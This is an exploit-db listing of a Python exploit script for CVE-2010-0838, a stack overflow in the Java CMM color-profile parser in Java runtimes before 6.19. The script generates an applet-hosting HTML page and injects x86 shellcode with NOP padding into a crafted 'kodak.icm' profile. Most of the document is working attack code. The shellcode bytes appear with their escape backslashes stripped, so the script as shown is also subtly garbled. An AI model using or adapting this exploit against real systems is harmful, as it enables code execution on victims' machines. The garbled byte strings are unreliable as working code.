[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MOAUB #20 - Java CMM readMabCurveData Stack Overflow
# Published : 2010-09-20
# Author : Abysssec
# Previous Title : Novell iPrint Client ActiveX Control call-back-url Buffer Overflow Exploit (meta)
# Next Title : SmarterMail 7.1.3876 Directory Traversal Vulnerability
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ <
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
'''
'''
Title : Java CMM readMabCurveData stack overflow
Version : Java runtime < 6.19
Analysis : http://www.abysssec.com
Vendor : http://www.java.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-0838
MOAUB Number : MOAUB_20_BA
http://www.exploit-db.com/moaub-20-java-cmm-readmabcurvedata-stack-overflow/
http://www.exploit-db.com/sploits/moaub-20-exploit.zip
'''
import sys
def main():
try:
strHTML = '''
<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>You have exploited!!!</H1>
<P><APPLET code="Curve.class" WIDTH="600" HEIGHT="400">
</APPLET></P>
</BODY>
</HTML> '''
fHTML = open('index.html', 'w')
fHTML.write(strHTML)
fHTML.close()
fdR = open('kodak.icm', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:9154]
str2 = strTotal[9648:]
shellcode = 'xEBx6Bx5Ax31xC9x6Ax10x52x42x52x51xFFxD0x53x68x7ExD8xE2x73xFFxD6x6Ax00xFFxD0xFFxD7x50x68xA8xA2x4DxBCxFFxD6xE8xDAxFFxFFxFFx00x54x68x65x20x65x78x70x6Cx6Fx69x74x20x77x61x73x20x73x75x63x63x65x73x73x66x75x6Cx21x00x5Ex6Ax30x59x64x8Bx19x8Bx5Bx0Cx8Bx5Bx1Cx8Bx1Bx8Bx5Bx08x53x68x8Ex4Ex0ExECxFFxD6x89xC7xE8xB3xFFxFFxFFx55x53x45x52x33x32x00xE8xD3xFFxFFxFFx53x55x56x57x8Bx6Cx24x18x8Bx45x3Cx8Bx54x05x78x01xEAx8Bx4Ax18x8Bx5Ax20x01xEBxE3x32x49x8Bx34x8Bx01xEEx31xFFxFCx31xC0xACx38xE0x74x07xC1xCFx0Dx01xC7xEBxF2x3Bx7Cx24x14x75xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8Bx5Ax1Cx01xEBx8Bx04x8Bx01xE8xEBx02x31xC0x5Fx5Ex5Dx5BxC2x08x00'
if len(shellcode) > 494:
print "[*] Error : Shellcode length is long"
return
if len(shellcode) <= 494:
dif = 494 - len(shellcode)
while dif > 0 :
shellcode += 'x90'
dif = dif - 1
fdW= open('kodak.icm', 'wb+')
fdW.write(str1)
fdW.write(shellcode)
fdW.write(str2)
fdW.close()
fdR.close()
print '[-] Html file generated'
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)
if __name__ == '__main__':
main()